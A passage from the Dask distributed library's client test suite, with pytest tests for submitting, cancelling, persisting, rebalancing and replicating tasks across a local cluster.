assert all(s.tasks[f.key].who_has == {aws} for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
x = c.submit(inc, 15, workers="127.0.0.3", allow_other_workers=True)
yield x
assert s.tasks[x.key].who_has
assert x.key in s.loose_restrictions
L = c.map(inc, range(15, 25), workers="127.0.0.3", allow_other_workers=True)
yield wait(L)
assert all(s.tasks[f.key].who_has for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
with pytest.raises(ValueError):
c.submit(inc, 1, allow_other_workers=True)
with pytest.raises(ValueError):
c.map(inc, [1], allow_other_workers=True)
with pytest.raises(TypeError):
c.submit(inc, 20, workers="127.0.0.1", allow_other_workers="Hello!")
with pytest.raises(TypeError):
c.map(inc, [20], workers="127.0.0.1", allow_other_workers="Hello!")
@pytest.mark.skipif("True", reason="because")
def test_bad_address():
try:
Client("123.123.123.123:1234", timeout=0.1)
except (IOError, gen.TimeoutError) as e:
assert "connect" in str(e).lower()
try:
Client("127.0.0.1:1234", timeout=0.1)
except (IOError, gen.TimeoutError) as e:
assert "connect" in str(e).lower()
@gen_cluster(client=True)
def test_long_error(c, s, a, b):
def bad(x):
raise ValueError("a" * 100000)
x = c.submit(bad, 10)
try:
yield x
except ValueError as e:
assert len(str(e)) < 100000
tb = yield x.traceback()
assert all(
len(line) < 100000
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
@gen_cluster(client=True)
def test_map_on_futures_with_kwargs(c, s, a, b):
def f(x, y=10):
return x + y
futures = c.map(inc, range(10))
futures2 = c.map(f, futures, y=20)
results = yield c.gather(futures2)
assert results == [i + 1 + 20 for i in range(10)]
future = c.submit(inc, 100)
future2 = c.submit(f, future, y=200)
result = yield future2
assert result == 100 + 1 + 200
class BadlySerializedObject(object):
def __getstate__(self):
return 1
def __setstate__(self, state):
raise TypeError("hello!")
class FatallySerializedObject(object):
def __getstate__(self):
return 1
def __setstate__(self, state):
print("This should never have been deserialized, closing")
import sys
sys.exit(0)
@gen_cluster(client=True)
def test_badly_serialized_input(c, s, a, b):
o = BadlySerializedObject()
future = c.submit(inc, o)
futures = c.map(inc, range(10))
L = yield c.gather(futures)
assert list(L) == list(map(inc, range(10)))
assert future.status == "error"
@pytest.mark.skipif("True", reason="")
def test_badly_serialized_input_stderr(capsys, c):
o = BadlySerializedObject()
future = c.submit(inc, o)
start = time()
while True:
sleep(0.01)
out, err = capsys.readouterr()
if "hello!" in err:
break
assert time() - start < 20
assert future.status == "error"
def test_repr(loop):
funcs = [str, repr, lambda x: x._repr_html_()]
with cluster(nworkers=3) as (s, [a, b, c]):
with Client(s["address"], loop=loop) as c:
for func in funcs:
text = func(c)
assert c.scheduler.address in text
assert "3" in text
for func in funcs:
text = func(c)
assert "not connected" in text
@gen_cluster(client=True)
def test_repr_async(c, s, a, b):
c._repr_html_()
@gen_cluster(client=True, worker_kwargs={"memory_limit": None})
def test_repr_no_memory_limit(c, s, a, b):
c._repr_html_()
@gen_test()
def test_repr_localcluster():
cluster = yield LocalCluster(
processes=False, dashboard_address=None, asynchronous=True
)
client = yield Client(cluster, asynchronous=True)
try:
text = client._repr_html_()
assert cluster.scheduler.address in text
assert is_valid_xml(client._repr_html_())
finally:
yield client.close()
yield cluster.close()
@gen_cluster(client=True)
def test_forget_simple(c, s, a, b):
x = c.submit(inc, 1, retries=2)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
yield wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
assert set(s.tasks) == {x.key, y.key, z.key}
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.tasks
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key not in s.tasks
assert z.key not in s.tasks
assert not s.tasks[y.key].dependents
s.client_releases_keys(keys=[y.key], client=c.id)
assert not s.tasks
@gen_cluster(client=True)
def test_forget_complex(e, s, A, B):
a, b, c, d = yield e.scatter(list(range(4)))
ab = e.submit(add, a, b)
cd = e.submit(add, c, d)
ac = e.submit(add, a, c)
acab = e.submit(add, ac, ab)
yield wait([a, b, c, d, ab, ac, cd, acab])
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[ab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[b.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, acab, a, c, d]}
s.client_releases_keys(keys=[acab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, a, c, d]}
assert b.key not in s.tasks
start = time()
while b.key in A.data or b.key in B.data:
yield gen.sleep(0.01)
assert time() < start + 10
s.client_releases_keys(keys=[ac.key], client=e.id)
assert set(s.tasks) == {f.key for f in [cd, a, c, d]}
@gen_cluster(client=True)
def test_forget_in_flight(e, s, A, B):
delayed2 = partial(delayed, pure=True)
a, b, c, d = [delayed2(slowinc)(i) for i in range(4)]
ab = delayed2(slowadd)(a, b, dask_key_name="ab")
cd = delayed2(slowadd)(c, d, dask_key_name="cd")
ac = delayed2(slowadd)(a, c, dask_key_name="ac")
acab = delayed2(slowadd)(ac, ab, dask_key_name="acab")
x, y = e.compute([ac, acab])
s.validate_state()
for i in range(5):
yield gen.sleep(0.01)
s.validate_state()
s.client_releases_keys(keys=[y.key], client=e.id)
s.validate_state()
for k in [acab.key, ab.key, b.key]:
assert k not in s.tasks
@gen_cluster(client=True)
def test_forget_errors(c, s, a, b):
x = c.submit(div, 1, 0)
y = c.submit(inc, x)
z = c.submit(inc, y)
yield wait([y])
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key in s.exceptions_blame
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[y.key], client=c.id)
assert x.key not in s.exceptions
assert x.key not in s.exceptions_blame
assert y.key not in s.exceptions_blame
assert z.key not in s.exceptions_blame
def test_repr_sync(c):
s = str(c)
r = repr(c)
assert c.scheduler.address in s
assert c.scheduler.address in r
assert str(2) in s # nworkers
assert "cores" in s
@gen_cluster(client=True)
def test_waiting_data(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
yield wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
@gen_cluster()
def test_multi_client(s, a, b):
c = yield Client(s.address, asynchronous=True)
f = yield Client(s.address, asynchronous=True)
assert set(s.client_comms) == {c.id, f.id}
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
yield wait([x, y])
assert s.wants_what == {
c.id: {x.key, y.key},
f.id: {y.key},
"fire-and-forget": set(),
}
assert s.who_wants == {x.key: {c.id}, y.key: {c.id, f.id}}
yield c.close()
start = time()
while c.id in s.wants_what:
yield gen.sleep(0.01)
assert time() < start + 5
assert c.id not in s.wants_what
assert c.id not in s.who_wants[y.key]
assert x.key not in s.who_wants
yield f.close()
start = time()
while s.tasks:
yield gen.sleep(0.01)
assert time() < start + 2, s.tasks
def long_running_client_connection(address):
with pristine_loop():
c = Client(address)
x = c.submit(lambda x: x + 1, 10)
x.result()
sleep(100)
@gen_cluster()
def test_cleanup_after_broken_client_connection(s, a, b):
proc = mp_context.Process(target=long_running_client_connection, args=(s.address,))
proc.daemon = True
proc.start()
start = time()
while not s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
proc.terminate()
start = time()
while s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
@gen_cluster()
def test_multi_garbage_collection(s, a, b):
c = yield Client(s.address, asynchronous=True)
f = yield Client(s.address, asynchronous=True)
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
yield wait([x, y])
x.__del__()
start = time()
while x.key in a.data or x.key in b.data:
yield gen.sleep(0.01)
assert time() < start + 5
assert s.wants_what == {c.id: {y.key}, f.id: {y.key}, "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id, f.id}}
y.__del__()
start = time()
while x.key in s.wants_what[f.id]:
yield gen.sleep(0.01)
assert time() < start + 5
yield gen.sleep(0.1)
assert y.key in a.data or y.key in b.data
assert s.wants_what == {c.id: {y.key}, f.id: set(), "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id}}
y2.__del__()
start = time()
while y.key in a.data or y.key in b.data:
yield gen.sleep(0.01)
assert time() < start + 5
assert not any(v for v in s.wants_what.values())
assert not s.who_wants
yield c.close()
yield f.close()
@gen_cluster(client=True)
def test__broadcast(c, s, a, b):
x, y = yield c.scatter([1, 2], broadcast=True)
assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
def test__broadcast_integer(c, s, *workers):
x, y = yield c.scatter([1, 2], broadcast=2)
assert len(s.tasks[x.key].who_has) == 2
assert len(s.tasks[y.key].who_has) == 2
@gen_cluster(client=True)
def test__broadcast_dict(c, s, a, b):
d = yield c.scatter({"x": 1}, broadcast=True)
assert a.data == b.data == {"x": 1}
def test_broadcast(c, s, a, b):
x, y = c.scatter([1, 2], broadcast=True)
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key},
b["address"]: {x.key, y.key},
}
[z] = c.scatter([3], broadcast=True, workers=[a["address"]])
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key, z.key},
b["address"]: {x.key, y.key},
}
@gen_cluster(client=True)
def test_proxy(c, s, a, b):
msg = yield c.scheduler.proxy(msg={"op": "identity"}, worker=a.address)
assert msg["id"] == a.identity()["id"]
@gen_cluster(client=True)
def test__cancel(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, x)
while y.key not in s.tasks:
yield gen.sleep(0.01)
yield c.cancel([x])
assert x.cancelled()
assert "cancel" in str(x)
s.validate_state()
start = time()
while not y.cancelled():
yield gen.sleep(0.01)
assert time() < start + 5
assert not s.tasks
s.validate_state()
@gen_cluster(client=True)
def test__cancel_tuple_key(c, s, a, b):
x = c.submit(inc, 1, key=("x", 0, 1))
result = yield x
yield c.cancel(x)
with pytest.raises(CancelledError):
yield x
@gen_cluster()
def test__cancel_multi_client(s, a, b):
c = yield Client(s.address, asynchronous=True)
f = yield Client(s.address, asynchronous=True)
x = c.submit(slowinc, 1)
y = f.submit(slowinc, 1)
assert x.key == y.key
yield c.cancel([x])
assert x.cancelled()
assert not y.cancelled()
start = time()
while y.key not in s.tasks:
yield gen.sleep(0.01)
assert time() < start + 5
out = yield y
assert out == 2
with pytest.raises(CancelledError):
yield x
yield c.close()
yield f.close()
@gen_cluster(client=True)
def test__cancel_collection(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
yield c.cancel(x)
yield c.cancel([x])
assert all(f.cancelled() for f in L)
assert not s.tasks
def test_cancel(c):
x = c.submit(slowinc, 1, key="x")
y = c.submit(slowinc, x, key="y")
z = c.submit(slowinc, y, key="z")
c.cancel([y])
start = time()
while not z.cancelled():
sleep(0.01)
assert time() < start + 5
assert x.result() == 2
z.cancel()
assert z.cancelled()
@gen_cluster(client=True)
def test_future_type(c, s, a, b):
x = c.submit(inc, 1)
yield wait([x])
assert x.type == int
assert "int" in str(x)
@gen_cluster(client=True)
def test_traceback_clean(c, s, a, b):
x = c.submit(div, 1, 0)
try:
yield x
except Exception as e:
f = e
exc_type, exc_value, tb = sys.exc_info()
while tb:
assert "scheduler" not in tb.tb_frame.f_code.co_filename
assert "worker" not in tb.tb_frame.f_code.co_filename
tb = tb.tb_next
@gen_cluster(client=True)
def test_map_differnet_lengths(c, s, a, b):
assert len(c.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert dask.base.get_scheduler() == c.get
out, err = capsys.readouterr()
assert len(out.strip().split("\n")) == 1
assert dask.base.get_scheduler() != c.get
@gen_cluster(timeout=60, client=True)
def test_async_persist(c, s, a, b):
from dask.delayed import delayed, Delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
w = delayed(add)(y, z)
yy, ww = c.persist([y, w])
assert type(yy) == type(y)
assert type(ww) == type(w)
assert len(yy.dask) == 1
assert len(ww.dask) == 1
assert len(w.dask) > 1
assert y.__dask_keys__() == yy.__dask_keys__()
assert w.__dask_keys__() == ww.__dask_keys__()
while y.key not in s.tasks and w.key not in s.tasks:
yield gen.sleep(0.01)
assert s.who_wants[y.key] == {c.id}
assert s.who_wants[w.key] == {c.id}
yyf, wwf = c.compute([yy, ww])
yyy, www = yield c.gather([yyf, wwf])
assert yyy == inc(1)
assert www == add(inc(1), dec(1))
assert isinstance(c.persist(y), Delayed)
assert isinstance(c.persist([y]), (list, tuple))
@gen_cluster(client=True)
def test__persist(c, s, a, b):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
g, h = c.compute([y, yy])
gg, hh = yield c.gather([g, h])
assert (gg == hh).all()
def test_persist(c):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
zz = yy.compute()
z = y.compute()
assert (zz == z).all()
@gen_cluster(timeout=60, client=True)
def test_long_traceback(c, s, a, b):
from distributed.protocol.pickle import dumps
def deep(n):
if n == 0:
1 / 0
else:
return deep(n - 1)
x = c.submit(deep, 200)
yield wait([x])
assert len(dumps(c.futures[x.key].traceback)) < 10000
assert isinstance(c.futures[x.key].exception, ZeroDivisionError)
@gen_cluster(client=True)
def test_wait_on_collections(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
yield wait(x)
assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(client=True)
def test_futures_of_get(c, s, a, b):
x, y, z = c.map(inc, [1, 2, 3])
assert set(futures_of(0)) == set()
assert set(futures_of(x)) == {x}
assert set(futures_of([x, y, z])) == {x, y, z}
assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
assert set(futures_of({"x": x, "y": [y]})) == {x, y}
b = db.Bag({("b", i): f for i, f in enumerate([x, y, z])}, "b", 3)
assert set(futures_of(b)) == {x, y, z}
sg = SubgraphCallable(
{"x": x, "y": y, "z": z, "out": (add, (add, (add, x, y), z), "in")},
"out",
("in",),
)
assert set(futures_of(sg)) == {x, y, z}
def test_futures_of_class():
da = pytest.importorskip("dask.array")
assert futures_of([da.Array]) == []
@gen_cluster(client=True)
def test_futures_of_cancelled_raises(c, s, a, b):
x = c.submit(inc, 1)
yield c.cancel([x])
with pytest.raises(CancelledError):
yield x
with pytest.raises(CancelledError):
yield c.get({"x": (inc, x), "y": (inc, 2)}, ["x", "y"], sync=False)
with pytest.raises(CancelledError):
c.submit(inc, x)
with pytest.raises(CancelledError):
c.submit(add, 1, y=x)
with pytest.raises(CancelledError):
c.map(add, [1], y=x)
assert "y" not in s.tasks
@pytest.mark.skip
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
def test_dont_delete_recomputed_results(c, s, w):
x = c.submit(inc, 1) # compute first time
yield wait([x])
x.__del__() # trigger garbage collection
yield gen.moment
xx = c.submit(inc, 1) # compute second time
start = time()
while xx.key not in w.data: # data shows up
yield gen.sleep(0.01)
assert time() < start + 1
while time() < start + (s.delete_interval + 100) / 1000: # and stays
assert xx.key in w.data
yield gen.sleep(0.01)
@gen_cluster(nthreads=[], client=True)
def test_fatally_serialized_input(c, s):
o = FatallySerializedObject()
future = c.submit(inc, o)
while not s.tasks:
yield gen.sleep(0.01)
@pytest.mark.skip(reason="Use fast random selection now")
@gen_cluster(client=True)
def test_balance_tasks_by_stacks(c, s, a, b):
x = c.submit(inc, 1)
yield wait(x)
y = c.submit(inc, 2)
yield wait(y)
assert len(a.data) == len(b.data) == 1
@gen_cluster(client=True)
def test_run(c, s, a, b):
results = yield c.run(inc, 1)
assert results == {a.address: 2, b.address: 2}
results = yield c.run(inc, 1, workers=[a.address])
assert results == {a.address: 2}
results = yield c.run(inc, 1, workers=[])
assert results == {}
@gen_cluster(client=True)
def test_run_handles_picklable_data(c, s, a, b):
futures = c.map(inc, range(10))
yield wait(futures)
def func():
return {}, set(), [], (), 1, "hello", b"100"
results = yield c.run_on_scheduler(func)
assert results == func()
results = yield c.run(func)
assert results == {w.address: func() for w in [a, b]}
def test_run_sync(c, s, a, b):
def func(x, y=10):
return x + y
result = c.run(func, 1, y=2)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(func, 1, y=2, workers=[a["address"]])
assert result == {a["address"]: 3}
@gen_cluster(client=True)
def test_run_coroutine(c, s, a, b):
results = yield c.run(geninc, 1, delay=0.05)
assert results == {a.address: 2, b.address: 2}
results = yield c.run(geninc, 1, delay=0.05, workers=[a.address])
assert results == {a.address: 2}
results = yield c.run(geninc, 1, workers=[])
assert results == {}
with pytest.raises(RuntimeError, match="hello"):
yield c.run(throws, 1)
if sys.version_info >= (3, 5):
results = yield c.run(asyncinc, 2, delay=0.01)
assert results == {a.address: 3, b.address: 3}
def test_run_coroutine_sync(c, s, a, b):
result = c.run(geninc, 2, delay=0.01)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(geninc, 2, workers=[a["address"]])
assert result == {a["address"]: 3}
t1 = time()
result = c.run(geninc, 2, delay=10, wait=False)
t2 = time()
assert result is None
assert t2 - t1 <= 1.0
def test_run_exception(c):
def raise_exception(exc_type, exc_msg):
raise exc_type(exc_msg)
for exc_type in [ValueError, RuntimeError]:
with pytest.raises(exc_type, match="informative message"):
c.run(raise_exception, exc_type, "informative message")
def test_diagnostic_ui(loop):
with cluster() as (s, [a, b]):
a_addr = a["address"]
b_addr = b["address"]
with Client(s["address"], loop=loop) as c:
d = c.nthreads()
assert d == {a_addr: 1, b_addr: 1}
d = c.nthreads([a_addr])
assert d == {a_addr: 1}
d = c.nthreads(a_addr)
assert d == {a_addr: 1}
d = c.nthreads(a["address"])
assert d == {a_addr: 1}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(inc, 3)
wait([x, y, z])
d = c.who_has()
assert set(d) == {x.key, y.key, z.key}
assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
assert all(d.values())
d = c.who_has([x, y])
assert set(d) == {x.key, y.key}
d = c.who_has(x)
assert set(d) == {x.key}
d = c.has_what()
assert set(d) == {a_addr, b_addr}
assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
d = c.has_what([a_addr])
assert set(d) == {a_addr}
d = c.has_what(a_addr)
assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(c):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
wait(incs + doubles)
assert c.nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert c.nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True)
def test_diagnostic_nbytes(c, s, a, b):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
yield wait(incs + doubles)
assert s.get_nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert s.get_nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_test()
def test_worker_aliases():
s = yield Scheduler(validate=True, port=0)
a = Worker(s.address, name="alice")
b = Worker(s.address, name="bob")
w = Worker(s.address, name=3)
yield [a, b, w]
c = yield Client(s.address, asynchronous=True)
L = c.map(inc, range(10), workers="alice")
future = yield c.scatter(123, workers=3)
yield wait(L)
assert len(a.data) == 10
assert len(b.data) == 0
assert dict(w.data) == {future.key: 123}
for i, alias in enumerate([3, [3], "alice"]):
result = yield c.submit(lambda x: x + 1, i, workers=alias)
assert result == i + 1
yield c.close()
yield [a.close(), b.close(), w.close()]
yield s.close()
def test_persist_get_sync(c):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
assert xxyy3.compute() == ((1 + 1) + (2 + 2)) + 10
@gen_cluster(client=True)
def test_persist_get(c, s, a, b):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
yield gen.sleep(0.5)
result = yield c.get(xxyy3.dask, xxyy3.__dask_keys__(), sync=False)
assert result[0] == ((1 + 1) + (2 + 2)) + 10
result = yield c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = yield c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = yield c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
def test_client_num_fds(loop):
psutil = pytest.importorskip("psutil")
with cluster() as (s, [a, b]):
proc = psutil.Process()
with Client(s["address"], loop=loop) as c: # first client to start loop
before = proc.num_fds() # measure
for i in range(4):
with Client(s["address"], loop=loop): # start more clients
pass
start = time()
while proc.num_fds() > before:
sleep(0.01)
assert time() < start + 4
@gen_cluster()
def test_startup_close_startup(s, a, b):
c = yield Client(s.address, asynchronous=True)
yield c.close()
c = yield Client(s.address, asynchronous=True)
yield c.close()
def test_startup_close_startup_sync(loop):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
sleep(0.1)
with Client(s["address"]) as c:
pass
with Client(s["address"]) as c:
pass
sleep(0.1)
with Client(s["address"]) as c:
pass
@gen_cluster(client=True)
def test_badly_serialized_exceptions(c, s, a, b):
def f():
class BadlySerializedException(Exception):
def __reduce__(self):
raise TypeError()
raise BadlySerializedException("hello world")
x = c.submit(f)
try:
result = yield x
except Exception as e:
assert "hello world" in str(e)
else:
assert False
@gen_cluster(client=True)
def test_rebalance(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[b.address]
x, y = yield c.scatter([1, 2], workers=[a.address])
assert len(a.data) == 2
assert len(b.data) == 0
s.validate_state()
yield c.rebalance()
s.validate_state()
assert len(b.data) == 1
assert {ts.key for ts in bws.has_what} == set(b.data)
assert bws in s.tasks[x.key].who_has or bws in s.tasks[y.key].who_has
assert len(a.data) == 1
assert {ts.key for ts in aws.has_what} == set(a.data)
assert aws not in s.tasks[x.key].who_has or aws not in s.tasks[y.key].who_has
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 4, client=True)
def test_rebalance_workers(e, s, a, b, c, d):
w, x, y, z = yield e.scatter([1, 2, 3, 4], workers=[a.address])
assert len(a.data) == 4
assert len(b.data) == 0
assert len(c.data) == 0
assert len(d.data) == 0
yield e.rebalance([x, y], workers=[a.address, c.address])
assert len(a.data) == 3
assert len(b.data) == 0
assert len(c.data) == 1
assert len(d.data) == 0
assert c.data == {x.key: 2} or c.data == {y.key: 3}
yield e.rebalance()
assert len(a.data) == 1
assert len(b.data) == 1
assert len(c.data) == 1
assert len(d.data) == 1
s.validate_state()
@gen_cluster(client=True)
def test_rebalance_execution(c, s, a, b):
futures = c.map(inc, range(10), workers=a.address)
yield c.rebalance(futures)
assert len(a.data) == len(b.data) == 5
s.validate_state()
def test_rebalance_sync(c, s, a, b):
futures = c.map(inc, range(10), workers=[a["address"]])
c.rebalance(futures)
has_what = c.has_what()
assert len(has_what) == 2
assert list(valmap(len, has_what).values()) == [5, 5]
@gen_cluster(client=True)
def test_rebalance_unprepared(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
yield gen.sleep(0.1)
yield c.rebalance(futures)
s.validate_state()
@gen_cluster(client=True)
def test_receive_lost_key(c, s, a, b):
x = c.submit(inc, 1, workers=[a.address])
result = yield x
yield a.close()
start = time()
while x.status == "finished":
assert time() < start + 5
yield gen.sleep(0.01)
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_unrunnable_task_runs(c, s, a, b):
x = c.submit(inc, 1, workers=[a.ip])
result = yield x
yield a.close()
start = time()
while x.status == "finished":
assert time() < start + 5
yield gen.sleep(0.01)
assert s.tasks[x.key] in s.unrunnable
assert s.get_task_status(keys=[x.key]) == {x.key: "no-worker"}
w = yield Worker(s.address, loop=s.loop)
start = time()
while x.status != "finished":
assert time() < start + 2
yield gen.sleep(0.01)
assert s.tasks[x.key] not in s.unrunnable
result = yield x
assert result == 2
yield w.close()
@gen_cluster(client=True, nthreads=[])
def test_add_worker_after_tasks(c, s):
futures = c.map(inc, range(10))
n = yield Nanny(s.address, nthreads=2, loop=s.loop, port=0)
result = yield c.gather(futures)
yield n.close()
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_workers_register_indirect_data(c, s, a, b):
[x] = yield c.scatter([1], workers=a.address)
y = c.submit(inc, x, workers=b.ip)
yield y
assert b.data[x.key] == 1
assert s.tasks[x.key].who_has == {s.workers[a.address], s.workers[b.address]}
assert s.workers[b.address].has_what == {s.tasks[x.key], s.tasks[y.key]}
s.validate_state()
@gen_cluster(client=True)
def test_submit_on_cancelled_future(c, s, a, b):
x = c.submit(inc, 1)
yield x
yield c.cancel(x)
with pytest.raises(CancelledError):
y = c.submit(inc, x)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
def test_replicate(c, s, *workers):
[a, b] = yield c.scatter([1, 2])
yield s.replicate(keys=[a.key, b.key], n=5)
s.validate_state()
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers) == 5
assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(client=True)
def test_replicate_tuple_keys(c, s, a, b):
x = delayed(inc)(1, dask_key_name=("x", 1))
f = c.persist(x)
yield c.replicate(f, n=5)
s.validate_state()
assert a.data and b.data
yield c.rebalance(f)
s.validate_state()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
def test_replicate_workers(c, s, *workers):
[a, b] = yield c.scatter([1, 2], workers=[workers[0].address])
yield s.replicate(
keys=[a.key, b.key], n=5, workers=[w.address for w in workers[:5]]
)
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers[:5]) == 5
assert sum(b.key in w.data for w in workers[:5]) == 5
assert sum(a.key in w.data for w in workers[5:]) == 0
assert sum(b.key in w.data for w in workers[5:]) == 0
yield s.replicate(keys=[a.key, b.key], n=1)
assert len(s.tasks[a.key].who_has) == 1
assert len(s.tasks[b.key].who_has) == 1
assert sum(a.key in w.data for w in workers) == 1
assert sum(b.key in w.data for w in workers) == 1
s.validate_state()
yield s.replicate(keys=[a.key, b.key], n=None) # all
assert len(s.tasks[a.key].who_has) == 10
assert len(s.tasks[b.key].who_has) == 10
s.validate_state()
yield s.replicate(
keys=[a.key, b.key], n=1, workers=[w.address for w in workers[:5]]
)
assert sum(a.key in w.data for w in workers[:5]) == 1
assert sum(b.key in w.data for w in workers[:5]) == 1
assert sum(a.key in w.data for w in workers[5:]) == 5
assert sum(b.key in w.data for w in workers[5:]) == 5
s.validate_state()
class CountSerialization(object):
def __init__(self):
self.n = 0
def __setstate__(self, n):
self.n = n + 1
def __getstate__(self):
return self.n
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
def test_replicate_tree_branching(c, s, *workers):
obj = CountSerialization()
[future] = yield c.scatter([obj])
yield s.replicate(keys=[future.key], n=10)
max_count = max(w.data[future.key].n for w in workers)
assert max_count > 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
def test_client_replicate(c, s, *workers):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
yield c.replicate([x, y], n=5)
assert len(s.tasks[x.key].who_has) == 5
assert len(s.tasks[y.key].who_has) == 5
yield c.replicate([x, y], n=3)
assert len(s.tasks[x.key].who_has) == 3
assert len(s.tasks[y.key].who_has) == 3
yield c.replicate([x, y])
s.validate_state()
assert len(s.tasks[x.key].who_has) == 10
assert len(s.tasks[y.key].who_has) == 10
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.2", 1), ("127.0.0.2", 1)],
timeout=None,
)
def test_client_replicate_host(client, s, a, b, c):
aws = s.workers[a.address]
bws = s.workers[b.address]
cws = s.workers[c.address]
x = client.submit(inc, 1, workers="127.0.0.2")
yield wait([x])
